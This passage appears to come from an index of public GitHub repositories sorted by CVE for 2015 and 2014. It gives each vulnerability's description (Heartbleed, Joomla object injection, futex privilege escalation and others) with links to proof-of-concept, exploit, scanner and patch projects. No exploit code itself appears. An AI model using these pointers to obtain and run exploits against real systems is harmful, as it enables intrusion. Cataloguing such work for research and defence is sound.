The networking implementation in the Linux kernel through 4.3.3, as used in Android and other products, does not validate protocol identifiers for certain protocol families, which allows local users to cause a denial of service (NULL function pointer dereference and system crash) or possibly gain privileges by leveraging CLONE_NEWUSER support to execute a crafted SOCK_RAW application.
- [bittorrent3389/CVE-2015-8543_for_SLE12SP1](https://github.com/bittorrent3389/CVE-2015-8543_for_SLE12SP1)
### CVE-2015-8562 (2015-12-16)
Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.
- [ZaleHack/joomla_rce_CVE-2015-8562](https://github.com/ZaleHack/joomla_rce_CVE-2015-8562)
- [RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC](https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC)
- [atcasanova/cve-2015-8562-exploit](https://github.com/atcasanova/cve-2015-8562-exploit)
- [thejackerz/scanner-exploit-joomla-CVE-2015-8562](https://github.com/thejackerz/scanner-exploit-joomla-CVE-2015-8562)
- [paralelo14/CVE-2015-8562](https://github.com/paralelo14/CVE-2015-8562)
- [VoidSec/Joomla_CVE-2015-8562](https://github.com/VoidSec/Joomla_CVE-2015-8562)
- [xnorkl/Joomla_Payload](https://github.com/xnorkl/Joomla_Payload)
- [guanjivip/CVE-2015-8562](https://github.com/guanjivip/CVE-2015-8562)
- [lorenzodegiorgi/setup-cve-2015-8562](https://github.com/lorenzodegiorgi/setup-cve-2015-8562)
- [Caihuar/Joomla-cve-2015-8562](https://github.com/Caihuar/Joomla-cve-2015-8562)
### CVE-2015-8651 (2015-12-28)
Integer overflow in Adobe Flash Player before 18.0.0.324 and 19.x and 20.x before 20.0.0.267 on Windows and OS X and before 11.2.202.559 on Linux, Adobe AIR before 20.0.0.233, Adobe AIR SDK before 20.0.0.233, and Adobe AIR SDK & Compiler before 20.0.0.233 allows attackers to execute arbitrary code via unspecified vectors.
- [Gitlabpro/The-analysis-of-the-cve-2015-8651](https://github.com/Gitlabpro/The-analysis-of-the-cve-2015-8651)
### CVE-2015-8660 (2015-12-28)
The ovl_setattr function in fs/overlayfs/inode.c in the Linux kernel through 4.3.3 attempts to merge distinct setattr operations, which allows local users to bypass intended access restrictions and modify the attributes of arbitrary overlay files via a crafted application.
- [whu-enjoy/CVE-2015-8660](https://github.com/whu-enjoy/CVE-2015-8660)
- [nhamle2/CVE-2015-8660](https://github.com/nhamle2/CVE-2015-8660)
- [carradolly/CVE-2015-8660](https://github.com/carradolly/CVE-2015-8660)
### CVE-2015-8710 (2016-04-11)
The htmlParseComment function in HTMLparser.c in libxml2 allows attackers to obtain sensitive information, cause a denial of service (out-of-bounds heap memory access and application crash), or possibly have unspecified other impact via an unclosed HTML comment.
- [Karm/CVE-2015-8710](https://github.com/Karm/CVE-2015-8710)
### CVE-2015-9235 (2018-05-29)
In jsonwebtoken node module before 4.2.2 it is possible for an attacker to bypass verification when a token digitally signed with an asymmetric key (RS/ES family) of algorithms but instead the attacker send a token digitally signed with a symmetric algorithm (HS* family).
- [aalex954/jwt-key-confusion-poc](https://github.com/aalex954/jwt-key-confusion-poc)
- [WinDyAlphA/CVE-2015-9235_JWT_key_confusion](https://github.com/WinDyAlphA/CVE-2015-9235_JWT_key_confusion)
### CVE-2015-9251 (2018-01-18)
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.
- [halkichi0308/CVE-2015-9251](https://github.com/halkichi0308/CVE-2015-9251)
### CVE-2015-10034 (2023-01-09)
In j-nowak workout-organizer wurde eine kritische Schwachstelle gefunden. Hierbei betrifft es unbekannten Programmcode. Mit der Manipulation mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Patch wird als 13cd6c3d1210640bfdb39872b2bb3597aa991279 bezeichnet. Als bestmögliche Massnahme wird Patching empfohlen.
- [andrenasx/CVE-2015-10034](https://github.com/andrenasx/CVE-2015-10034)
### CVE-2015-20107 (2022-04-13)
In Python (aka CPython) up to 3.10.8, the mailcap module does not add escape characters into commands discovered in the system mailcap file. This may allow attackers to inject shell commands into applications that call mailcap.findmatch with untrusted input (if they lack validation of user-provided filenames or arguments). The fix is also back-ported to 3.7, 3.8, 3.9
- [codeskipper/python-patrol](https://github.com/codeskipper/python-patrol)
### CVE-2015-57115
- [TrixSec/CVE-2015-57115](https://github.com/TrixSec/CVE-2015-57115)
## 2014
### CVE-2014-0038 (2014-02-06)
The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter.
- [saelo/cve-2014-0038](https://github.com/saelo/cve-2014-0038)
- [kiruthikan99/IT19115276](https://github.com/kiruthikan99/IT19115276)
### CVE-2014-0043 (2017-10-02)
In Apache Wicket 1.5.10 or 6.13.0, by issuing requests to special urls handled by Wicket, it is possible to check for the existence of particular classes in the classpath and thus check whether a third party library with a known security vulnerability is in use.
- [JJK96/JavaClasspathEnum](https://github.com/JJK96/JavaClasspathEnum)
### CVE-2014-0050 (2014-03-28)
MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.
- [jrrdev/cve-2014-0050](https://github.com/jrrdev/cve-2014-0050)
### CVE-2014-0094 (2014-03-10)
The ParametersInterceptor in Apache Struts before 2.3.16.2 allows remote attackers to "manipulate" the ClassLoader via the class parameter, which is passed to the getClass method.
- [HasegawaTadamitsu/CVE-2014-0094-test-program-for-struts1](https://github.com/HasegawaTadamitsu/CVE-2014-0094-test-program-for-struts1)
- [y0d3n/CVE-2014-0094](https://github.com/y0d3n/CVE-2014-0094)
### CVE-2014-0114 (2014-04-30)
Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.
- [rgielen/struts1filter](https://github.com/rgielen/struts1filter)
- [ricedu/struts1-patch](https://github.com/ricedu/struts1-patch)
- [aenlr/strutt-cve-2014-0114](https://github.com/aenlr/strutt-cve-2014-0114)
### CVE-2014-0130 (2014-05-07)
Directory traversal vulnerability in actionpack/lib/abstract_controller/base.rb in the implicit-render implementation in Ruby on Rails before 3.2.18, 4.0.x before 4.0.5, and 4.1.x before 4.1.1, when certain route globbing configurations are enabled, allows remote attackers to read arbitrary files via a crafted request.
- [omarkurt/cve-2014-0130](https://github.com/omarkurt/cve-2014-0130)
### CVE-2014-0160 (2014-04-07)
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
- [FiloSottile/Heartbleed](https://github.com/FiloSottile/Heartbleed)
- [titanous/heartbleeder](https://github.com/titanous/heartbleeder)
- [DominikTo/bleed](https://github.com/DominikTo/bleed)
- [cyphar/heartthreader](https://github.com/cyphar/heartthreader)
- [jdauphant/patch-openssl-CVE-2014-0160](https://github.com/jdauphant/patch-openssl-CVE-2014-0160)
- [musalbas/heartbleed-masstest](https://github.com/musalbas/heartbleed-masstest)
- [obayesshelton/CVE-2014-0160-Scanner](https://github.com/obayesshelton/CVE-2014-0160-Scanner)
- [Lekensteyn/pacemaker](https://github.com/Lekensteyn/pacemaker)
- [isgroup/openmagic](https://github.com/isgroup/openmagic)
- [fb1h2s/CVE-2014-0160](https://github.com/fb1h2s/CVE-2014-0160)
- [takeshixx/ssl-heartbleed.nse](https://github.com/takeshixx/ssl-heartbleed.nse)
- [roganartu/heartbleedchecker-chrome](https://github.com/roganartu/heartbleedchecker-chrome)
- [zouguangxian/heartbleed](https://github.com/zouguangxian/heartbleed)
- [sensepost/heartbleed-poc](https://github.com/sensepost/heartbleed-poc)
- [proactiveRISK/heartbleed-extention](https://github.com/proactiveRISK/heartbleed-extention)
- [amerine/coronary](https://github.com/amerine/coronary)
- [0x90/CVE-2014-0160](https://github.com/0x90/CVE-2014-0160)
- [ice-security88/CVE-2014-0160](https://github.com/ice-security88/CVE-2014-0160)
- [waqasjamal-zz/HeartBleed-Vulnerability-Checker](https://github.com/waqasjamal-zz/HeartBleed-Vulnerability-Checker)
- [siddolo/knockbleed](https://github.com/siddolo/knockbleed)
- [sammyfung/openssl-heartbleed-fix](https://github.com/sammyfung/openssl-heartbleed-fix)
- [a0726h77/heartbleed-test](https://github.com/a0726h77/heartbleed-test)
- [pblittle/aws-suture](https://github.com/pblittle/aws-suture)
- [hreese/heartbleed-dtls](https://github.com/hreese/heartbleed-dtls)
- [wwwiretap/bleeding_onions](https://github.com/wwwiretap/bleeding_onions)
- [idkqh7/heatbleeding](https://github.com/idkqh7/heatbleeding)
- [GeeksXtreme/ssl-heartbleed.nse](https://github.com/GeeksXtreme/ssl-heartbleed.nse)
- [xlucas/heartbleed](https://github.com/xlucas/heartbleed)
- [indiw0rm/-Heartbleed-](https://github.com/indiw0rm/-Heartbleed-)
- [einaros/heartbleed-tools](https://github.com/einaros/heartbleed-tools)
- [mozilla-services/Heartbleed](https://github.com/mozilla-services/Heartbleed)
- [yryz/heartbleed.js](https://github.com/yryz/heartbleed.js)
- [DisK0nn3cT/MaltegoHeartbleed](https://github.com/DisK0nn3cT/MaltegoHeartbleed)
- [OffensivePython/HeartLeak](https://github.com/OffensivePython/HeartLeak)
- [vortextube/ssl_scanner](https://github.com/vortextube/ssl_scanner)
- [mpgn/heartbleed-PoC](https://github.com/mpgn/heartbleed-PoC)
- [xanas/heartbleed.py](https://github.com/xanas/heartbleed.py)
- [iSCInc/heartbleed](https://github.com/iSCInc/heartbleed)
- [marstornado/cve-2014-0160-Yunfeng-Jiang](https://github.com/marstornado/cve-2014-0160-Yunfeng-Jiang)
- [hmlio/vaas-cve-2014-0160](https://github.com/hmlio/vaas-cve-2014-0160)
- [hybridus/heartbleedscanner](https://github.com/hybridus/heartbleedscanner)
- [froyo75/Heartbleed_Dockerfile_with_Nginx](https://github.com/froyo75/Heartbleed_Dockerfile_with_Nginx)
- [Xyl2k/CVE-2014-0160-Chrome-Plugin](https://github.com/Xyl2k/CVE-2014-0160-Chrome-Plugin)
- [caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC](https://github.com/caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC)
- [Saymeis/HeartBleed](https://github.com/Saymeis/HeartBleed)
- [cved-sources/cve-2014-0160](https://github.com/cved-sources/cve-2014-0160)
- [cheese-hub/heartbleed](https://github.com/cheese-hub/heartbleed)
- [artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS](https://github.com/artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS)
- [cldme/heartbleed-bug](https://github.com/cldme/heartbleed-bug)
- [ThanHuuTuan/Heartexploit](https://github.com/ThanHuuTuan/Heartexploit)
- [rouze-d/heartbleed](https://github.com/rouze-d/heartbleed)
- [WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed](https://github.com/WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed)
- [GuillermoEscobero/heartbleed](https://github.com/GuillermoEscobero/heartbleed)
- [anthophilee/A2SV--SSL-VUL-Scan](https://github.com/anthophilee/A2SV--SSL-VUL-Scan)
- [ingochris/heartpatch.us](https://github.com/ingochris/heartpatch.us)
- [belmind/heartbleed](https://github.com/belmind/heartbleed)
- [pierceoneill/bleeding-heart](https://github.com/pierceoneill/bleeding-heart)
- [h3xcr4ck3r/CVE-2014-0160_Heartbleed](https://github.com/h3xcr4ck3r/CVE-2014-0160_Heartbleed)
- [GardeniaWhite/fuzzing](https://github.com/GardeniaWhite/fuzzing)
- [undacmic/heartbleed-proof-of-concept](https://github.com/undacmic/heartbleed-proof-of-concept)
- [cbk914/heartbleed-checker](https://github.com/cbk914/heartbleed-checker)
- [MrE-Fog/CVE-2014-0160-Chrome-Plugin](https://github.com/MrE-Fog/CVE-2014-0160-Chrome-Plugin)
- [timsonner/cve-2014-0160-heartbleed](https://github.com/timsonner/cve-2014-0160-heartbleed)
- [Yash-Thakkar77/CVE-2014-0160-HeartBleed](https://github.com/Yash-Thakkar77/CVE-2014-0160-HeartBleed)
### CVE-2014-0166 (2014-04-09)
The wp_validate_auth_cookie function in wp-includes/pluggable.php in WordPress before 3.7.2 and 3.8.x before 3.8.2 does not properly determine the validity of authentication cookies, which makes it easier for remote attackers to obtain access via a forged cookie.
- [Ettack/POC-CVE-2014-0166](https://github.com/Ettack/POC-CVE-2014-0166)
### CVE-2014-0195 (2014-06-05)
The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment.
- [ricedu/CVE-2014-0195](https://github.com/ricedu/CVE-2014-0195)
### CVE-2014-0196 (2014-05-07)
The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings.
- [SunRain/CVE-2014-0196](https://github.com/SunRain/CVE-2014-0196)
- [tempbottle/CVE-2014-0196](https://github.com/tempbottle/CVE-2014-0196)
### CVE-2014-0224 (2014-06-05)
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the "CCS Injection" vulnerability.
- [Tripwire/OpenSSL-CCS-Inject-Test](https://github.com/Tripwire/OpenSSL-CCS-Inject-Test)
- [iph0n3/CVE-2014-0224](https://github.com/iph0n3/CVE-2014-0224)
- [droptables/ccs-eval](https://github.com/droptables/ccs-eval)
- [ssllabs/openssl-ccs-cve-2014-0224](https://github.com/ssllabs/openssl-ccs-cve-2014-0224)
- [secretnonempty/CVE-2014-0224](https://github.com/secretnonempty/CVE-2014-0224)
### CVE-2014-0226 (2014-07-20)
Race condition in the mod_status module in the Apache HTTP Server before 2.4.10 allows remote attackers to cause a denial of service (heap-based buffer overflow), or possibly obtain sensitive credential information or execute arbitrary code, via a crafted request that triggers improper scoreboard handling within the status_handler function in modules/generators/mod_status.c and the lua_ap_scoreboard_worker function in modules/lua/lua_request.c.
- [shreesh1/CVE-2014-0226-poc](https://github.com/shreesh1/CVE-2014-0226-poc)
### CVE-2014-0282 (2014-06-11)
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-1775, CVE-2014-1779, CVE-2014-1799, CVE-2014-1803, and CVE-2014-2757.
- [Charmve/PyStegosploit](https://github.com/Charmve/PyStegosploit)
### CVE-2014-0291
- [niccoX/patch-openssl-CVE-2014-0291_CVE-2015-0204](https://github.com/niccoX/patch-openssl-CVE-2014-0291_CVE-2015-0204)
### CVE-2014-0472 (2014-04-23)
The django.core.urlresolvers.reverse function in Django before 1.4.11, 1.5.x before 1.5.6, 1.6.x before 1.6.3, and 1.7.x before 1.7 beta 2 allows remote attackers to import and execute arbitrary Python modules by leveraging a view that constructs URLs using user input and a "dotted Python path."
- [christasa/CVE-2014-0472](https://github.com/christasa/CVE-2014-0472)
### CVE-2014-0521 (2014-05-14)
Adobe Reader and Acrobat 10.x before 10.1.10 and 11.x before 11.0.07 on Windows and OS X do not properly implement JavaScript APIs, which allows remote attackers to obtain sensitive information via a crafted PDF document.
- [molnarg/cve-2014-0521](https://github.com/molnarg/cve-2014-0521)
### CVE-2014-0816 (2014-02-27)
Unspecified vulnerability in Norman Security Suite 10.1 and earlier allows local users to gain privileges via unknown vectors.
- [tandasat/CVE-2014-0816](https://github.com/tandasat/CVE-2014-0816)
### CVE-2014-0993 (2014-09-15)
Buffer overflow in the Vcl.Graphics.TPicture.Bitmap implementation in the Visual Component Library (VCL) in Embarcadero Delphi XE6 20.0.15596.9843 and C++ Builder XE6 20.0.15596.9843 allows remote attackers to execute arbitrary code via a crafted BMP file.
- [helpsystems/Embarcadero-Workaround](https://github.com/helpsystems/Embarcadero-Workaround)
### CVE-2014-160
- [menrcom/CVE-2014-160](https://github.com/menrcom/CVE-2014-160)
- [GitMirar/heartbleed_exploit](https://github.com/GitMirar/heartbleed_exploit)
### CVE-2014-1266 (2014-02-22)
The SSLVerifySignedServerKeyExchange function in libsecurity_ssl/lib/sslKeyExchange.c in the Secure Transport feature in the Data Security component in Apple iOS 6.x before 6.1.6 and 7.x before 7.0.6, Apple TV 6.x before 6.0.2, and Apple OS X 10.9.x before 10.9.2 does not check the signature in a TLS Server Key Exchange message, which allows man-in-the-middle attackers to spoof SSL servers by (1) using an arbitrary private key for the signing step or (2) omitting the signing step.
- [landonf/Testability-CVE-2014-1266](https://github.com/landonf/Testability-CVE-2014-1266)
- [linusyang/SSLPatch](https://github.com/linusyang/SSLPatch)
- [gabrielg/CVE-2014-1266-poc](https://github.com/gabrielg/CVE-2014-1266-poc)
- [meetlight942/PentesterLab-Intercept-CVE-2014-1266](https://github.com/meetlight942/PentesterLab-Intercept-CVE-2014-1266)
### CVE-2014-1303 (2014-03-26)
Heap-based buffer overflow in Apple Safari 7.0.2 allows remote attackers to execute arbitrary code and bypass a sandbox protection mechanism via unspecified vectors, as demonstrated by Liang Chen during a Pwn2Own competition at CanSecWest 2014.
- [RKX1209/CVE-2014-1303](https://github.com/RKX1209/CVE-2014-1303)
### CVE-2014-1322 (2014-04-23)
The kernel in Apple OS X through 10.9.2 places a kernel pointer into an XNU object data structure accessible from user space, which makes it easier for local users to bypass the ASLR protection mechanism by reading an unspecified attribute of the object.
- [raymondpittman/IPC-Memory-Mac-OSX-Exploit](https://github.com/raymondpittman/IPC-Memory-Mac-OSX-Exploit)
### CVE-2014-1447 (2014-01-24)
Race condition in the virNetServerClientStartKeepAlive function in libvirt before 1.2.1 allows remote attackers to cause a denial of service (libvirtd crash) by closing a connection before a keepalive response is sent.
- [tagatac/libvirt-CVE-2014-1447](https://github.com/tagatac/libvirt-CVE-2014-1447)
### CVE-2014-1677 (2017-04-03)
Technicolor TC7200 with firmware STD6.01.12 could allow remote attackers to obtain sensitive information.
- [tihmstar/freePW_tc7200Eploit](https://github.com/tihmstar/freePW_tc7200Eploit)
### CVE-2014-1767 (2014-07-08)
Double free vulnerability in the Ancillary Function Driver (AFD) in afd.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability."
- [ExploitCN/CVE-2014-1767-EXP-PAPER](https://github.com/ExploitCN/CVE-2014-1767-EXP-PAPER)
### CVE-2014-1773 (2014-06-11)
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-1783, CVE-2014-1784, CVE-2014-1786, CVE-2014-1795, CVE-2014-1805, CVE-2014-2758, CVE-2014-2759, CVE-2014-2765, CVE-2014-2766, and CVE-2014-2775.
- [day6reak/CVE-2014-1773](https://github.com/day6reak/CVE-2014-1773)
### CVE-2014-1812 (2014-05-14)
The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."
- [mauricelambert/gpp-encrypt](https://github.com/mauricelambert/gpp-encrypt)
### CVE-2014-2064 (2014-10-17)
The loadUserByUsername function in hudson/security/HudsonPrivateSecurityRealm.java in Jenkins before 1.551 and LTS before 1.532.2 allows remote attackers to determine whether a user exists via vectors related to failed login attempts.
- [Naramsim/Offensive](https://github.com/Naramsim/Offensive)
### CVE-2014-2321 (2014-03-11)
web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.
- [injectionmethod/ZTE-Vuln-4-Skids](https://github.com/injectionmethod/ZTE-Vuln-4-Skids)
- [injectionmethod/Windows-ZTE-Loader](https://github.com/injectionmethod/Windows-ZTE-Loader)
### CVE-2014-2323 (2014-03-14)
SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.
- [cirocosta/lighty-sqlinj-demo](https://github.com/cirocosta/lighty-sqlinj-demo)
### CVE-2014-2324 (2014-03-14)
Multiple directory traversal vulnerabilities in (1) mod_evhost and (2) mod_simple_vhost in lighttpd before 1.4.35 allow remote attackers to read arbitrary files via a .. (dot dot) in the host name, related to request_check_hostname.
- [sp4c30x1/uc_httpd_exploit](https://github.com/sp4c30x1/uc_httpd_exploit)
### CVE-2014-2383 (2014-04-28)
dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
- [Relativ3Pa1n/CVE-2014-2383-LFI-to-RCE-Escalation](https://github.com/Relativ3Pa1n/CVE-2014-2383-LFI-to-RCE-Escalation)
### CVE-2014-2630 (2014-08-12)
Unspecified vulnerability in HP Operations Agent 11.00, when Glance is used, allows local users to gain privileges via unknown vectors.
- [redtimmy/perf-exploiter](https://github.com/redtimmy/perf-exploiter)
### CVE-2014-2734 (2014-04-24)
The openssl extension in Ruby 2.x does not properly maintain the state of process memory after a file is reopened, which allows remote attackers to spoof signatures within the context of a Ruby script that attempts signature verification after performing a certain sequence of filesystem operations. NOTE: this issue has been disputed by the Ruby OpenSSL team and third parties, who state that the original demonstration PoC contains errors and redundant or unnecessarily-complex code that does not appear to be related to a demonstration of the issue. As of 20140502, CVE is not aware of any public comment by the original researcher
- [gdisneyleugers/CVE-2014-2734](https://github.com/gdisneyleugers/CVE-2014-2734)
- [adrienthebo/cve-2014-2734](https://github.com/adrienthebo/cve-2014-2734)
### CVE-2014-2815 (2014-08-12)
Microsoft OneNote 2007 SP3 allows remote attackers to execute arbitrary code via a crafted OneNote file that triggers creation of an executable file in a startup folder, aka "OneNote Remote Code Execution Vulnerability."
- [Edubr2020/CABTrap_OneNote2007](https://github.com/Edubr2020/CABTrap_OneNote2007)
### CVE-2014-3120 (2014-07-28)
The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.
- [jeffgeiger/es_inject](https://github.com/jeffgeiger/es_inject)
- [echohtp/ElasticSearch-CVE-2014-3120](https://github.com/echohtp/ElasticSearch-CVE-2014-3120)
- [xpgdgit/CVE-2014-3120](https://github.com/xpgdgit/CVE-2014-3120)
### CVE-2014-3153 (2014-06-07)
The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.
- [timwr/CVE-2014-3153](https://github.com/timwr/CVE-2014-3153)
- [android-rooting-tools/libfutex_exploit](https://github.com/android-rooting-tools/libfutex_exploit)
- [geekben/towelroot](https://github.com/geekben/towelroot)
- [lieanu/CVE-2014-3153](https://github.com/lieanu/CVE-2014-3153)
- [zerodavinci/CVE-2014-3153-exploit](https://github.com/zerodavinci/CVE-2014-3153-exploit)
- [c3c/CVE-2014-3153](https://github.com/c3c/CVE-2014-3153)
- [dangtunguyen/TowelRoot](https://github.com/dangtunguyen/TowelRoot)
- [elongl/CVE-2014-3153](https://github.com/elongl/CVE-2014-3153)
- [c4mx/Linux-kernel-code-injection_CVE-2014-3153](https://github.com/c4mx/Linux-kernel-code-injection_CVE-2014-3153)
### CVE-2014-3341 (2014-08-19)
The SNMP module in Cisco NX-OS 7.0(3)N1(1) and earlier on Nexus 5000 and 6000 devices provides different error messages for invalid requests depending on whether the VLAN ID exists, which allows remote attackers to enumerate VLANs via a series of requests, aka Bug ID CSCup85616.
- [ehabhussein/snmpvlan](https://github.com/ehabhussein/snmpvlan)
### CVE-2014-3466 (2014-06-03)
Buffer overflow in the read_server_hello function in lib/gnutls_handshake.c in GnuTLS before 3.1.25, 3.2.x before 3.2.15, and 3.3.x before 3.3.4 allows remote servers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a long session id in a ServerHello message.
- [azet/CVE-2014-3466_PoC](https://github.com/azet/CVE-2014-3466_PoC)
### CVE-2014-3507 (2014-08-13)
Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
- [Satheesh575555/openSSL_1.0.1g_CVE-2014-3507](https://github.com/Satheesh575555/openSSL_1.0.1g_CVE-2014-3507)
### CVE-2014-3544 (2014-07-29)
Cross-site scripting (XSS) vulnerability in user/profile.php in Moodle through 2.3.11, 2.4.x before 2.4.11, 2.5.x before 2.5.7, 2.6.x before 2.6.4, and 2.7.x before 2.7.1 allows remote authenticated users to inject arbitrary web script or HTML via the Skype ID profile field.
- [aforesaid/MoodleHack](https://github.com/aforesaid/MoodleHack)
### CVE-2014-3551 (2014-07-29)
Multiple cross-site scripting (XSS) vulnerabilities in the advanced-grading implementation in Moodle through 2.3.11, 2.4.x before 2.4.11, 2.5.x before 2.5.7, 2.6.x before 2.6.4, and 2.7.x before 2.7.1 allow remote authenticated users to inject arbitrary web script or HTML via a crafted (1) qualification or (2) rating field in a rubric.
- [JavaGarcia/CVE-2014-3551](https://github.com/JavaGarcia/CVE-2014-3551)
### CVE-2014-3566 (2014-10-15)
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.
- [mikesplain/CVE-2014-3566-poodle-cookbook](https://github.com/mikesplain/CVE-2014-3566-poodle-cookbook)
- [stdevel/poodle_protector](https://github.com/stdevel/poodle_protector)
- [cloudpassage/mangy-beast](https://github.com/cloudpassage/mangy-beast)
- [mpgn/poodle-PoC](https://github.com/mpgn/poodle-PoC)
- [uthrasri/openssl_g2.5_CVE-2014-3566](https://github.com/uthrasri/openssl_g2.5_CVE-2014-3566)
### CVE-2014-3570 (2015-01-09)
The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c.
- [uthrasri/openssl_G2.5_CVE-2014-3570](https://github.com/uthrasri/openssl_G2.5_CVE-2014-3570)
- [uthrasri/Openssl_G2.5_CVE-2014-3570_01](https://github.com/uthrasri/Openssl_G2.5_CVE-2014-3570_01)
- [uthrasri/CVE-2014-3570](https://github.com/uthrasri/CVE-2014-3570)
- [uthrasri/CVE-2014-3570_G2.5_openssl_no_patch](https://github.com/uthrasri/CVE-2014-3570_G2.5_openssl_no_patch)
### CVE-2014-3625 (2014-11-20)
Directory traversal vulnerability in Pivotal Spring Framework 3.0.4 through 3.2.x before 3.2.12, 4.0.x before 4.0.8, and 4.1.x before 4.1.2 allows remote attackers to read arbitrary files via unspecified vectors, related to static resource handling.
- [ilmila/springcss-cve-2014-3625](https://github.com/ilmila/springcss-cve-2014-3625)
- [gforresu/SpringPathTraversal](https://github.com/gforresu/SpringPathTraversal)
### CVE-2014-3704 (2014-10-16)
The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
- [happynote3966/CVE-2014-3704](https://github.com/happynote3966/CVE-2014-3704)
- [AleDiBen/Drupalgeddon](https://github.com/AleDiBen/Drupalgeddon)
### CVE-2014-4014 (2014-06-23)
The capabilities implementation in the Linux kernel before 3.14.8 does not properly consider that namespaces are inapplicable to inodes, which allows local users to bypass intended chmod restrictions by first creating a user namespace, as demonstrated by setting the setgid bit on a file with group ownership of root.
- [vnik5287/cve-2014-4014-privesc](https://github.com/vnik5287/cve-2014-4014-privesc)
### CVE-2014-4076 (2014-11-11)
Microsoft Windows Server 2003 SP2 allows local users to gain privileges via a crafted IOCTL call to (1) tcpip.sys or (2) tcpip6.sys, aka "TCP/IP Elevation of Privilege Vulnerability."
